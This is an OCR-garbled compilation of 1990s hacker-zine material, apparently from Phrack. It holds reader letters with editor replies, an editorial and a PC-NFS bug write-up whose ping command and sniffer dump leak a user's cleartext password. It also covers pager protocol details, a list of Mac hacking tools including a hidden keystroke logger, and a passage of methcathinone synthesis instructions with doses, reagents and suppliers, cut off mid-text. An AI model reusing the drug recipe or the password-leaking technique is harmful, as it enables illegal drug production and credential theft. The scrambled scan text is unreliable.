I ve tried to locate these guys who have Black book for cracking 
passwords in major software and some games as well.They go by the Names 
of Jolly Reaper and Maugan Ra aka Manix.Iam doc X from London (not a 
pig!!!) if U happpen to know these doodez let us know.TA from GB 


[ Perhaps you have Phrack confused with something having to do with 
pirated software. I’d ask that question in a posting to the USENET 
group alt.warez or on the IRC #warez channels. ] 


Erie, 
i have been searching the internet for some kind of script that 
will subscribe a certain email address to a shitload of 
mailing lists...i have heard of such a thing. 
what im lacking is that keyword to search for such as: 


bombard 
attack 
flash 


what is the technical term for this kind of attack? 

or better yet, do you know where to get a hold of such a script. 

im not familiar with mailing lists and id rather not spend the time 
researching the topic...but i need vengeance quickly :-) 


any help appreciated, 
-roger 


[ The name for this type of attack? Uh, an email bomb? 
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But let’s take a closer look at your mail: 


"id rather not spend the time researching the topic...but I need vengeanc 
quickly" 


I’m not going to be your fucking research assistant, or your accomplice. 
If you can’t figure out how to look through our back issues to find any of 
the tons of fake mailers we’ve printed, or figure out how to automate them 
using shell script, then you don’t deserve to live, much less 

get your speedy vengeanc 


Couldn’t you even come up with a NON-LAME way to get back at someone? Hell, 
even rewriting their .login to say "exit" or something silly like that is 
more clever, and less cliche, than flooding their inbox. ] 


The art of " information manipulation " has possessed my virgin soul ! I 
turned into a fuckin’ 2-year old (drool and all) when experiencing the free 
local call system involving a paperclip . All I’ve been thinking is hack, 
haCK, HACK ! I’m still drenched behind the ears but I’m a patient, turbo 
learner (whatever the hell that means) ! 


Here’s the problem: I possess some info that could make you smile so 
big, that your sphinctor would unwrinkle. I would like to experiment, if you 
will . Perhaps, dabble with this stuff , but I am very uneducated in raping 
mainframes. This could be a major wood producer 
because my EX works at this establishment 


I need a trustworthy pro who possesses a plethora of tasty tactics . Whic 
h way to the Dagobah System..... I seek YODA !! 


[ Drooling 2-year old. 


Very uneducated in raping mainframes. 


Major wood producer. 


Well, gee, I’m sure your info would make my "sphinctor" unwrinkle, but I’m 
wearing a new pair of jeans, so I guess I’1l have to take a rain check. 


God bless AOL for bringing the internet to the masses! ] 


i want to be added to your list. and could you send me unziped hacking 
software or can you tell me how to unzip softwarre nd a beginners guide 
to hacking. i would appreciate it i want to begin fun new field of 
hacking thank you 


[ You want to learn all about hacking, but you don’t know how to unzip 
files? 


Crawl before you run, Kwai Chang. ] 


VA'CH CO’ TAI 


Anh Ta’m ddi du li.ch xa, ngu? ta.i mo%*.t kha’ch sa.n. DDa™ ma%*’y 
tie*’ng ddo* ‘ng ho** ro**i anh ngu? kho*ng ddu*o*.c vi’ tie*’ng cu*o**%i 
no’i huye*n na’o tu** pho‘ng be*n ca.nh vo.ng sang. Ro~ ra‘ng la* ho. 
ddang dda’nh ba‘i, sa’t pha.t nhau a(n thua lo*’n. 


Ra’ng nhi.n cho to*’i 3 gio** sa’ng va*~n cu*’ tra(‘n tro.c hoa‘i, anh 
Ta’m chi.u he*’t no%*?i, be‘n go” nhe. va‘o va’ch dde*? nha(’c khe’o 
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pho*‘ng be*n ca.nh. 


Anh Ta’m vu**a go” xong la*®.p tu*’c anh nghe mo%*.t gio.ng tenor he’t le*n 
tu** pho*‘ng be%*n: 


-— Tro**i o*1i! Co’ bie*’t ba*y gio** la* ma*’y gio** sa’ng ro**%i 
kho*ng? O*? ddo’ ma* ddo’ng ddinh treo hi‘nh! 


[Uh, let’s see...No Boom Boom with soul brother. Soul Brother too beaucoup. 


Ddi Ma’o.] 


Hola me gustaria tener mucha informacion de lo que ustedes hacen sobre 

todo de como lo hacen. Es decir que me manden informacion de los secretos 

de los sistemas operativos de internet de todo lo que me puedan mandar. 
yo soy universitario, y me gusta todo lo relacionado con redes. 


Muchos saludos. 
Contestenme. 


[ What is this, International Day? 


'Si quieras mucha informacion, LEA MUCHOS LIBROS! !DIOS MIO! !No estoy 
el maestro del mundo! Ehehe, esta fue solomente una chiste. No esta 
nunca libros en espanol sobre <<computer security>>. Que lastima. 


If you want to learn, start with english...then go buy th ntire O’Reilly 
Yellow series and Blue series. That will get you started learning 
"los secretos de los sistemas operativos de internet." ] 


From: "Erik K. Escobar" 
Subject: Apology 


This letter is to be forwared to the newsgroup io.general by madmagic, in 
care of Mr. Escobar. 


I would like to send a public apology to Internex Online for the 
treatment I have given the staff and users of this system. I threw 
around some threats and words that can incriminate me, and realized that 
it was a stupid idea on my behalf. In the last week or so with the 
negative attention I have gotten, I got to know the IO/ICAN staff a bit 
better and everything in good standing. Me and Internex Online are now 
even and there will be no retaliation or sour words from me. I just want 
everything to go back to the norm. 


Erik 


[ * AND THEN * ] 


From: "Erik K. Escobar" 
Subject: Shit 


As my understanding, A letter of apology under my name was redistributed 
around within my mailing list and whatever. As some of you know, myself 
and Zencor have been having problems with Internex in the past and near 
the middle of this week, I got into a large battle with was ACC, ICAN, 
and Internex Online -vs- Me. It is stupid to get into an argument with 
that many corporations, and a few words and threats were thrown, they 
locked my account. I wrote a letter in response of that and they 
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proceded to lock other Zencor staff accounts and hack our web site. Also 
they posted the letter in the news groups and whatever. They eventually 
decided to charge me and whatever, and to save me time outta the courts 
and crap like that I made an apology for the threats, seeing that they 
could incriminate me. Internex has done wrong and I probably won’t be 
seeing alot of apologies coming my way. If they didn’t have certain info 
about me..they could have me very well laughing at them but that is not 
the case. 


Erik 
Lord Kaotik 
[ ZENCOR TECHNOLOGIES ] 


[ Can you say, LAME? ] 


Been trying to locate for some time the file, plusmap.txt that used to be on 
the phrack bbs (716-871-1915). This file outlined information regarding the 
videopal in the videocipher II plus satellite decoder module. Any idea where 
I might find this file? 


[ I didn’t know there was a "phrack" bbs. <Sigh> 


In any case, I would look for information regarding this on the following 
sites: 


http://www.scramblingnews.com 
http://www.hackerscatalog.com 
http://ireland.iol.ie/~kooltek/welcome.html 


Satellite Watch BBS : 517-685-2451 


This ought to get you in the right direction. ] 


Hi, 


Just a quick note to tell you about the Hawaii Education Literacy Project - 
a non-profit organization - and our efforts to promote literacy by making 
electronic text easier and more enjoyable to read. Given that we’re both in 
the reading biz, I thought you might be interested. 


ReadToMe, our first program, reads aloud any form of electronic text, 
including Web pages, and is free to anyone who wishes to use it. 


The "Web Designers" section of our home page tells you how your pages can 
literally speak to your audience. Actually, all you need to do to make your 
pages audible is to add the following html code: 


<P><A HREF="http://www.pixi.com/~ readerl/readweb.bok">Hear 


This Page!</A> Requires ReadToMe Software... Don’t got it? <A 
HREF="http://www.pixi.com/~ readerl">GET IT FREE!</A> 
</P> 


A beta test version of the program can be obtained from 
http://www.pixi.com/”~readerl. I encourage you and your readers to download 
a copy and take it for a spin. 


Thank you for your time, 
Rob Hanson 


rhanson@freeway.net 
Hawaii Education Literacy Project 
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[ Honestly, I don’t know if this is a spam to a list of magazine people, or 
really a phrack reader. I have this thing about jumk email, and the joy of 
offering that info to our thousands of bored hacker readers looking for 
an excuse to fuck with some system. 


TI’1l1 let them decide if this was a spam. Thanks, Rob. ] 


KKEKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


SYNTHETIC PLEASURES opens in the US theaters 


KKKKKKKKKKKKKKKKKKKKKKKKKKKK KK KK 


save the date, spread the word. forgive us if you got this before. 


eerily memorable is SYNTHETIC PLEASURES, a trippy, provocative tour through 
the perfectly artificial worlds of cyberspace, plastic surgery, 
mind-altering chemicals and controlled, man-made environments that 
questions whether the natural world is redundant, or even necessary. those 
who see it will want to pinch themselves when it’s over. 

(janet maslin- The New York Times) 


for further info contact: 
caipirinha@caipirinha.com 
http://www.syntheticpleasures.com 


first opening dates: 


Aug 29 Los Angeles, CA- Nuart Theatre 
Aug 30 San Francisco, CA- Castro Theatre 
Aug 30 Berkeley, CA- UC Theatre 

Aug 30 San Jose, CA- Towne Theatr 

Aug 30 Palo Alto, CA- Aquarius Theatre 
Aug 30 Portland, OR- Cinema 21 

Sept 13 San Diego, CA- Ken Theatr 

Sept 13 NYC, NY- Cinema Village 

Sept 13 NYC, NY- City Cinemas 

Sept 13 Larkspur, CA- Larkspur Theatre 
Sept 20 Boston, MA- Kendall Square Theater 
Sept 20 Cleveland, OH- Cedar Lee 

Sept 20 Philadelphia, PA- Ritz 

Sept 22 Vorheess, NJ- Ritz 12 

Sept 27 Austin, TX- Dobie Theater 

Sept 27 New Haven, CT- York Theatre 


Sept 27 Pittsburgh, PA- Rex 

Oct 4 Washington, DC- Key Cinema 

Oct 11 Providence, RI- Avon Theater 
Oct 11 Kansas City, MO- Tivoli 

Oct 11 Baltimore,MD - Charles Theatre 
Oct 18 Waterville MA- Railroad Square 
Oct 18 Durham,NC - Carolina Theater 
Oct 18 Raleigh, NC - Colony Theater 
Oct 18 Chapel Hill,NC -The Chelsea Theatr 
Oct 25 Seattle, WA- Varsity 

Nov 8 Ft Lauderdale FL- Fox Sunrise 
Nov 15 Gainesville,FL —- Plaza Theater 


Nov 16 Hanover, NH- Dartmouth Theater 
Nov 22 Miami, FL- Alliance 
Nov 25,29,30 Tampa FL - Tampa Theatre 
Dec 13 Chicago, IL —- Music Box 


[ THIS WAS DEFINATELY A SPAM. 


I wonder what lovely cgi-bin holes that WWW site is sporting. 
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like 


MGM got for the "Hackers" WWW page. Oh man, what a dilemma. 
To hack, or not to hack. Assholes. ] 
==Phrack Magazine== 
Volume Seven, Issue Forty-Eight, File 2a of 18 
Phrack Editorial 
by 
Erik Bloodaxe 
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shrunk considerably. With the incredibly low prices of powerful personal 
computers, and the free availablity of complex operating systems, the need 
to break into remote systems in order to learn has been removed. The only 
possible needs being met by remote intrusions would be a means to gather 
specific information to be sold, or that base psychological rush from doing 
something forbidden and getting away with it. Chasing any high only leads 
to a serious crash, and in the case of breaking into computers, that 

only leads to jail. 


There is absolutely nothing cool about going to jail. I know too many 

people who are currently in jail, who have been in jail, and some who are 

on their way to jail. Trust me on this, people. You will not be 

respected by anyone if you act rashly, do something careless and 

end up being convicted of several felonies. In fact, all of your "friends," 
(those who didn’t get busted along with you, and turn state’s evidence against 
you) will just think you were a moron for being so sloppy...until they also 
get nailed. 


Get raided and you will almost certainly spend time in jail. Even once you 
are released, you will lose your passport and your ability to travel freely, 
you will lose your ability to do business in classified environments, you 
will become unemployable by most companies, you may even lose your rights to 
use computer or networking equipment for years. Is is still worth it? 


I break into computers for a living, and I love my job. However, I don’t 
kid myself about just how lucky I really am. Don’t fool yourselves into 
thinking that it was easy for me to achieve this, or that anyone else can 
easily slip into such a role. Staking out a claim in the information security 
industry is a continual battle for a hacker. Your past will constantly 

stand in your way, especially if you try to hide it and lie to everyon 

(Read the recent Forbes ASAP article and spot the hacker from Garrison 
Associates lying about his past, although he was raided for running 
t 
iS) 


he Scantronics Publications BBS in San Deigo just a few short years ago. 
hame on you Kludge.) 


I’ve never lied about anything, so that can’t be held over my head. I’ve 
never been convicted of anything either, although I came closer to jail 
than hopefully any of you will ever experience. The ONLY reason I avoided 
prison was the fact that law enforcement was not prepared to deal with 
that type of crime. Now, I’ve taught many of those same law enforcement 
agencies about the nature of computer crimes. They are all learning and 
not making the same mistakes any more. 


At the same time, the technology to protect against intrusions has increased 
dramatically. Technology now exists that will not only stop attacks, but 
identify the attack methodology, the location of the attacker, and take 
appropriate countermeasures all in real-time. The company I work for makes it. 
I’ve always said that anything that can stop me will stop almost anyone, 

even through I’m not anywhere close to the world’s best. There simply 

aren’t that many things to monitor, once you know what to look for. 


The rewards have diminished and the risks have increased. 


Hacking is not about crime. You don’t need to be a criminal to be a hacker. 
Hanging out with hackers doen’t make you a hacker any more than hanging 

out in a hospital makes you a doctor. Wearing the t-shirt doesn’t 

increase your intelligence or social standing. Being cool doesn’t mean 
treating everyone like shit, or pretending that you know more than everyone 
around you. 


Of course, I’m just a bitter old sell-out living in the past, so 
what do I know? 


Well, what I do know, is that even though I’m one of the few screaming about 
how fucked up and un-fun everything has become, I’m not alone in my disgust. 
There are a bunch of us who have reached the conclusion that the "scene" 

is not worth supporting; that the cons are not worth attending; that the 

new influx of would-be hackers is not worth mentoring. Maybe a lot of us 
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have finally grown up. 


In response, expect a great many to suddenly disappear from the cons. We’1l be 
doing our own thing, drinking a few cool drinks someplace warm, and reflecting 
on the collective pasts we’ve all drawn from, and how the lack of that 
developmental stage has ruined the newer generations. So those of us 

with that shared frame of reference will continue to meet, enjoy each 

other’s company, swap stock tips in the same breath as operating system 

flaws, and dream about the future of security. 


You’ re probably not invited. 
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LINN AL AT // // \=\ =SSs5 
ft X\X\F \\ // S/ ss=/0 ==55 
Part I 
PC-NFS Bug 
I have found a nice little security hole in PC-NFS version 5.x. If you 


ping a PC-NFS user with a packet size of between 1450 to 1480, the 
PC’s ICMP reply packet will divulge: 


The hostname of the PC 

The hostname of the PC’s authentication server 
The username of the person logged in 

The password for the user (Thank you very much!) 


0000 


All of this information is in clear text unless PC-NFS’s NETLOGIN is 
used. NETLOGIN uses XOR as its encryption, so this is hardly secure 
either. 


NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested 
and all freely return the above information on both PC-NFS versions 
5.0 and 5.la. This should work with other driver/NIC configurations 
also. 


You get the occasional added bonus of locking up the victims PC as 
well! 


This bug was new to Sun and they have created a new PCNFS.SYS 

driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD. 

This new version fills reply ICMP packets with nulls after 200 bytes of 
the requested pattern. 


Until you receive this patch from Sun, I would recommend setting all 
external router interface MTU to a value of no greater than 1350 as this 
is point where secrets are contained in the return packet. 


The Unix command to generate the below results is as follows: 


ping -s -cl pchost.victim.com 1480 


Use your favorite sniffer to filter ICMP packets and you have it. If you 
don’t have a sniffer, try the -v(erbose) option of ping and convert the 
hex to ascii starting around byte 1382. 


Sniffer output follows: 


19:03:48.81 
ip: evil.com->pchost.victim.com 
icmp: echo request 
62: 024 025 026 027 030 031 032 033 034 035 


72: 036 037 ] " # $ % & if 
82: ( ) * + P - : / 0) 1 
92: 2 3 4 5 6 a 8 9 ; ; 


102 < = > ? @ A B Cc D 


ical 
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1472: 226 227 230 231 232 233 234 235 236 237 
1482: 240 241 242 243 244 245 246 247 250 251 


19:03:48.85 
ip: pchost.victim.com->evil 
icmp: echo reply 
62: 024 025 026 027 030 031 032 033 034 035 


72: 036 037 ! " $ % & if 
82:5 ( ) m + F = : / 0 1 
928 2 3 4 5 6 7 8 9 3 ' 
102: < = > ? @ A B Cc D E 
112: F G H I J K L M N O 
122: P Q R Ss a U V W x Y 
132: Z [ \ “ = Y a b c 
142: d e £ g h 1 5 k 1 m 
152: n fe) p gq xr iS 1 u Vv Ww 
162: x y Z, | } NEL 20:0. 2201. 
172: 202 203 204 205 206 207 210° 211 212 213 
182: 214 215 216 217 220 221 222 223 224 225 
92: 226 227 230 231 232 233 234 235 236 237 


202: 240 241 242 243 244 245 246 247 250 251 
212: 252 253 254 255 256 257 260 261 262 263 
222: 264 265 266 267 270 271 272 273 274 275 
232: 276 277 300 301 302 303 304 305 306 307 
242: 310 311 312 313 314 315 316 317 320 321 
252: 322 323 324 325 000 000 324 005 ? $ 
262: : 004 000 000 000 000 000 000 000 000 
272: 036 006 W Vv P S Q R 016 007 
282: 277 * $ 213 367 350 Xx Pp Lr c 
292: 212 E 
302: 353 W < 005 u 005 350 W 002 353 
< 


SL2: N 010 u 007 306 006 325 # OO1 
S228 B93 H < 015 u 007 306 006 325 # 
3323. 0019-353 = < 017 u 007 306 006 325 
SAD: # 001 353 2 < 022 u 005 350 021 


3522 002° 353 $ < 003 u 005 350 9 003 
362: 353 033 < 022 w 017 2 344 213 360 
372: 212 204 300 # P 350..229..305 Xx. 353 
382: 010 P 270 c 000 350 213 305 X 306 
392: 006 205 347 000 Z Y [ X a 


402: 007 037 313 im S) Q R U 036 006 
412: W V 214 310 216 330 216 300 306 006 
422: 325 # 000 373 277 a S273 A 347 
432: 271 006 000 215 6 d $ 212 004 210 
442: 005 212 007 210 004 EF G © 342 363 
452: 241 x $ 243 | $ 241 Zz $ 243 
462 F $ 241 324 ) 243 x $ 241 326 
472 ) 243 Zz S21 i S$ 212 E 
482 < 010 u 015 P 270 * 000 350 $ 
492: 305 X 350 275 001 353 022 S405 u 


522: 205 347 000 ~ _— 007 037 ] Z Y 
532 [ X 303 P 270 < 000 350 363 304 
542 X 307 E $ 000 000 215 u ™ 213 


592 o 211 ] 030 213 E 020 206 340 005 
602: 016 000 243 ; % 211 > b % 214 
612: 016 d % 277 a % . 376 006 ? 
622: 020 350 9 276 376 016 2? 020 303 
632: & 213 E 002 013 300 t 020 243 326 
642: # & 213 004 211 036 330 # 350 
6o2> 234 
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1362: { 255 023 000 242 265 015 000 002 000 
1372: 000 000 S 017 005 000 C 003 000 000 
1382: p c h fe) s t 000 000 000 000 
1392: 000 000 000 000 000 000 244 A @ = 
1402: s e r Vv e r 1 000 000 O00 
1412: 000 000 000 000 000 000 244 A @ O01 
1422: 000 000 000 000 000 000 000 000 000 000 
432: 000 000 000 000 000 000 244 A @ O01 
1442: u s e r n a m e 000 000 
1452: p a s s Ww d 000 000 000 000 
462: 000 000 000 000 000 000 000 000 000 000 
472: 000 000 000 000 000 000 000 000 000 000 
482: 000 000 200 000 k 000 260 271 377 377 
492: 344 275 9 212 


The names have been changed to protect the innocent, but the rest is actual. 


Byte 1382: PC’s hostname 


Byte 1402: PC’s Authentication server hostname 
Byte 1382: The user’s account name. Shows nobody if logged out. 
Byte 1382: The user’s password. 


POCSAG paging format, code and code capacity 


The POCSAG (Post Office Code Standardization Advisory Group) code is a 
synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH 
structure. The POCSAG codes provides improved battery-saving capability and an 
increased code capacity. 

The POCSAG code format consists of a preamble and one or more batches of 
codewords. Each batch comprises a 32-bit frame synchronization code and eight 
64-bit address frames of two 32-bit addresses or idle codewords each. The 

frame synchronization code marks the start of the batch of codewords. 


—-PREAMBLE STRUCTURE 
The preamble consists of 576 bits of an alternating 101010 pattern transmitted 
at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to 
determine if the data received is a POCSAG signal and for synchronization with 
the stream of data. 


Preambl First Batch Subsec. Batch-- 
<< 
paging 576 bits of | | | | | | | | | > > 
format reversals i a ame (acd PPR FF) Ea Cas PG PF 
(LOLOL 07s (eee (Sih ele ileal eed Fe tli le ae has 
f= aes eel rae lady vues eA ce) Pea [nc Pte (ed aie I | SS 
>> 
1 FRAME = 2 CODEWORDS 
Preamble Batchs 
512 BPS 1125 mS 1062.5 mS 
1200 BPS 480 mS 453.3 mS 
CodeWords Structure 
BIT 
NUMBER 1 2-6 19 20,21 22 to sl 32 
ADDRESS 
FORMAT 0 Address Bits Ss“ 1B Parity Check Bits Even parity 


A 


Source identifier bits 
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MESSAGE | | | | | 
FORMAT | 1 | Message Bits Parity Check Bits | Even parity 


-BATCH STRUCTURE 
A batch consist of frame synchronization code follow by 8 frames of two address 
codewords per frame (16 address codewords per batch). In order to maintain the 

proper batch structure, each frame is filled with two address codewords, or two 
idle codewords, or two message codewords, or any appropriate combination of the 
three codewords types. 


-FRAME SYNCHRONIZATION CODE STRUCTURE 
The frame synchronization (FS) code is a unique, reserved word that is used to 
identify the beginning of each batch. The FS code comprises the 32 bits: 


GJ 


011111100110100100001010111011000. 


-OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS 

An alternate frame synchronization (AFS) code can be selected to support special 
systems or systems that require increased coding capability. The AFS is 
generated in the same manner as an address codeword (i.e., BCH codeword with 
parity bits). The POCSAG signaling standard has reserved special codewords for 
the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging 
system to support the AFS. The AFS will change to frame 0 on the programmer 
since no frame information is included in the AFS. The AFS should use address 

1 so that bit 20 and 21 are 0. 


-ADDRESS CODEWORD STRUCTURE 
An address codeword’s first bit (bit 1) is always a zero. Bits 2 through 19 are 
the address bits. The pagers looks at these bits to find its own unique 
address. Each POCSAG codeword is capable of providing address information for 
four different paging sources (Address 1 to 4). These address are determined 
by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits 
22 through 31 are the parity check bits, and bit 32 is the even parity bit. 


BIT 20 BEL. 22. 
Address 1 0 0 
Address 2 0 ik 
Address 3 iL 0 
Address 4 I. 1 


Pre-coded into the code plug are three bits which designate the frame location, 
within each batch, at which the pager’s address is to be received; the decoder 
will look at the codewords in this frame for its address. 

Power is removed from the receiver during all frames other than the precoded 
one, thus extending pager battery life. 


-CODE CAPACITY 

The combination of the code plug’s three pre-coded frame location bits and address codeword 
's 18 address bits provides over two million different assignable codes. In this combinatio 
n, the frame location bits are the least-significant bits, and the addres 

s 

bits are the most-significant bits. 


-MESSAGE CODEWORD STRUCTURE 
A message codeword structure always start with a 1 in bit 1 and always follows 
directly after the address. Each message codeword replaces an address codeword 
in the batch. 


-IDLE CODEWORD STRUCTURE 
The idle codeword is unique, reserved codeword used to talk place of an address 
in any frame that would not otherwise be filled with 64 bits. 


Thus, if a frame contains only an address, an idle codeword comprises the 32 
bits: 


01111010100010011100000110010111 
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-POCSAG CHARACTERS 


CHAR HEX CHAR HEX CHAR HEX 
# 23 S 24 @ 40 
5B \ 5C ] 5D 
5E = DE 60 
{ 7B | 7TC } 7D 
os TE DEL TE SP 20 


MACINTOSH HACKING 
by Logik Bomb 


"My fellow astronauts..." 
—Dan Quayle 


Now, two people have mailed Erik Bloodaxe asking about Macintosh 
hacking particularly war dialers, and each time he insulted Macs and tried 
to get someone to write a file on it. No one has done it. So I guess I have 
to. 


First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the 
originators of the Apple and the Macintosh were busted for phreaking in 
college. The Apple IIe was used almost universally by hackers. So why has 
the Mac fallen out of favor for hacking? Simple. Because it fell out of 
favor for everything else. Apple screwed up and wouldn’t let clone makers 
license the MacOS. As a result, 80% of personal computers run DOS, and 
Macintoshes are left in the minority. Second, DOS compatible users, and 
hackers in particular, have an image of Mac users as a bunch of whiny 
lamers who paid too much for a computer and as a result are constantly 
defensive. The solution to this impression is to not be an asshole. I know 
it drives every Mac user crazy when he reads some article about Windows 
95’s brand new, advanced features such as "plug-and-play" that the 
Macintosh has had since 1984. But just try and take it. If it’s any 
consolation, a lot of IBM-compatible (a huge misnomer, by the way) users 
hate Windows too. 

Now, on with the software. 


Assault Dialer 1.5 

Assault Dialer, by Crush Commando, is the premier Mac war dialer, 
the Mac’s answer to ToneLoc. It has an ugly interface, but it’s the best we 
have right now. It is the successor to a previous war dialer known as Holy 
War Dialer 2.0. The only real competitor I’ve heard of for Assault Dialer 
is Tyrxis Shockwave 2.0, but the only version I could get a hold of was 
1.0, and it wasn’t as good as Assault Dialer, so that’s your best bet right 
now. 


MacPGP 2.6.2 and PGPfone 1.0b4 

MacPGP is the Macintosh port of the infamous PGP (Pretty Good 
Privacy.) This file is not about cryptography, so if you want to know about 
PGP read the fuckin’ read me and docs that come with the file. Strangely 
enough, however, Phil Zimmerman released PGPfone, a utility for encrypting 
your phone and making it a secure line, for the Mac _first._ I don’t know 
why, and I haven’t had a chance to test it, but the idea’s pretty cool. If 
PGP doesn’t get Zimmerman thrown in jail, this will. 


DisEase 1.0 and DisEase 3.0 

Schools and concerned parents have always had a problem. Schools 
can’t have students deleting the hard drive, and parents don’t want their 
kids looking at the kinky pictures they downloaded. So Apple came out with 
At Ease, an operating system that runs over System 7, sort of the same way 
Windows runs off of DOS. However, I can’t stand At Ease. Everything about 
it, from the Fisher-Price screen to the interface drives me crazy. It 
drives a lot of other people crazy too. So it was just a matter of time 
before someone made a program to override it. The first was DisEase 1.0, a 
small program by someone calling himself Omletman, that would override At 
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Ease if you put in a floppy loaded with it and clicked six times. Omletman 
improved this design and eventually released 3.0. (I haven’t been able to 
find any evidence that a 2.0 was ever released) 3.0 has such cool features 
as reading the preferences file to give you the password, so you can change 
the obnoxious greeting teachers always put to something more sinister. The 
only problem with 3.0 is that some configurations of At Ease only let 
documents be read off of disks; no applications, which means DisEase 3.0 
won’t appear, and so you can’t run it. However, with 1.0 you don’t have to 
actually open the application, you just click six times, so if you use 1.0 
to get to the finder, and then 3.0 to read the passwords, things will work. 


Invisible Oasis Installer 

Oasis is a keystroke recorder, so you can find out passwords. 
However, with the original Oasis, you had to put it in the Extensions 
folder and make it invisible with ResEdit, which takes a while. Invisible 
Oasis Installer, however, installs it where it should be and automatically 
makes it invisible. 
"So everything’s wrapped up in a nice neat little _package_, then?" 
-Homer Simpson 


Anonymity 2.0 and Repersonalize 1.0 

Anonymity, version 1.2, was a rather old program whose author has 
long been forgotten that was the best data fork alterer available. It 
removed the personalization to programs. However, in around 1990 someone 
named the Doctor made 2.0, a version with some improvements. Repersonalize 
was made in 1988 (God, Mac hacking programs are old) which reset 
personalization on some of the Microsoft and Claris programs, so you could 
enter a different personalization name. I don’t know if it will still work 
on Microsoft Word 6.0.1 and versions of programs released recently, but I 
don’t really care because I use Word 5.la and I’m probably not going to 
upgrade for a while. 


Phoney (AKA Phoney4Mac) 

Phoney is an excellent program that emulates the Blue Box, Red Box, 
Black Box and Green Box tones. There is also Phoney4Newton, which does the 
same thing on the most portable of computers, the Newton. 


That’s all I’m covering in this file as far as Mac hacking 
programs. You’ll probably want to know where to find all this crap, so here 
are all of the Mac hacking ftp and Web sites I know of: 

Space Rogue’s Whacked Mac Archives (http://l0pht.com/~ spacerog/index.htm1) 

This site, run by Space Rogue is LOpht Heavy Industries’ Mac site. 
It is probably the largest and best archive of Mac hacking software 
connected to the Internet. The problem with this is that it can’t handle 
more than two anonymous users, meaning that unless you pay to be part of 
LOpht, you will never get into this archive. I’ve tried getting up at 4:30 
AM, thinking that no one in their right mind would possibly be awake at 
this time, but there is always, somehow, somewhere, two people in Iceland 
or Singapore or somewhere on this site. 

The Mac Hacking Home Page (http://www.aloha.com/~ seanw/index.htm1) 

This site does not look like much, and it is fairly obvious that 
its maintainer, Sean Warren, is still learning HTML, but it is reliable and 
is a good archive. It is still growing, probably due to the fact that it is 
one of the only Internet Mac hacking sites anyone can get to and upload. 
KnOwledge Phreak <kOp> (http://www.uccs.edu/~ abusby/k0p.htm1) 

This is an excellent site and has many good programs. There is one 
catch, however. It’s maintainer, Ole Buzzard, is actually getting the files 
from his BBS. So many of the really good files are locked away in the k0p 
BBS, and those of us who can’t pay long distance can’t get the files. Oh 
well. 

Bone’s H/P/C Page o’ rama- part of the Cyber Rights Now! home page 
(http: //www.lib.iup.edu/~ seaman/index.htm1) 

While this is hardly a Macintosh hacking site, it’s just a hacking 
site, it does have very few Mac files, some of which are hard to get to. 
However, Bone might get expelled because of a long story involving AOHell, 
so this page might not be here. Then again, maybe Bone won’t get expelled 
and this site will stay. Never can tell ’bout the future, can you? 

"We predict the future. We invent it." 
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-Nasty government guy on the season premiere of _The X-Files_ 


Andy Ryder 

Netsurfer and Road Warrior on the Info Highway 

I’ve pestered Bruce Sterling _and_ R.U. Sirius! 

As mentioned in the alt.devilbunnies FAQ, part I (Look it up!) 
Once scored 29,013,920 points on Missile Command 


"This Snow Crash thing- is it a virus, a drug, or a religion?" 
-Hiro Protagonist 

"What’s the difference?" 
—Juanita Marquez 


".,..one person’s ’cyberpunk’ is another’s everyday obnoxious teenager with 
some technical skill thrown in..." 

-Erich Schneider, "alt.cyberpunk Frequently Asked Questions List" 
"More than _some_ technical skill." 


-Andy Ryder 
Making Methcathinone 
Compiled 
by Anonymous 
Ok, this has got to be the easiest drug made at home (by far). This is very 
similar to methamphetamine in structure, effect, and use. Typical doses 


start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add 
10 mg) or through mucous membranes (nasally). 


Ingredients: 

Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine. 

Potassium chromate, or dichromate (easily gotten from chem lab. orange/red) 

Conc. Sulfuric acid - it’s up to you where you get this. Contact me if you 
need help locating it. 

Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it 

is used for cleaning concrete. 
Sodium Hydroxide - Hardware stores. AKA lye. 
Toluene - Hardware store, paint store. 


Lab equipment: 
1 liter, 3 neck flask - get it from school or Edmund’s Scientific ($20.00) 


125 mL separatory funnel - same as above 

glass tubing - same as above 

Buchner funnel - This is a hard to find item, but must schools have at least 
one. They are usually white porcelain or plastic. They look 
like a funnel with a flat disk in the bottom with lots of 
holes in it. If you need one, arrangements can be made. 

Aspirator or vacuum pump —- Any lab-ware supply catalog, about $10.00 


References to Edmund’s Scientific Co, in NJ, are accurate. You have to go 
to their "Lab Surplus/Mad Scientist" room. The prices are incredibl 
This place is definitely a recommended stopping sight for anybody going 


through New Jersey. It is located in "Barrington", about 30 minutes from 
center city Philadelphia. 

All of the above can be purchased from "The Al-Chymist". Their number is 
(619) 948-4150. Their address is: 17525 Alder #49 


Hesperia, Ca 92345 
Call and ask for a catalog. 


That’s it. The body of this article is stolen from the third edition of 
"Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried 
and proven method by many people. If you want a copy of this book, contact 
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me. 


Good luck and keep away from the DEA 


METHCATHINON 


ia 


Koed i@ 


tH 


N IMPROVIESED CRANK 


The latest designer variant upon the amphetamine molecule to gain 
popularity and publicity is methcathinone, commonly called cat. This 
substance is remarkably similar to the active ingredient found in the 
leaves of the khat tree which the loyal drug warriors on the network news 
blame for turning peace loving Somalis into murderous psychopaths. The 
active ingredient in the khat leaves is cathinone, which has the same 
structural relationship to methcathinone that amphetamine has to 
methamphetamine. It is made by oxidizing ephedrine, while meth can be 
made by reducing ephedrine. 


The high produced by methcathinone is in many ways similar to 
methamphetamine. For something so easily made and purified, it is 
actually quite enjoyable. the main differences between the meth high and 
the methcathinone high are length of action and body fell. With 
methcathinone, one can expect to still get to sleep about 8 hours after a 


large dose. On the down side, it definitely gives me the impression that 
the substance raises the blood pressure quite markedly. This drug may not 
be safe for people with weak hearts of blood vessels. Be warned! 


Cat is best made using chrome in the +6 oxidation state as the 
oxidizer. I recall seeing an article in the narco swine’s Journal of 
Forensic Science bragging about how they worked out a method for making it 
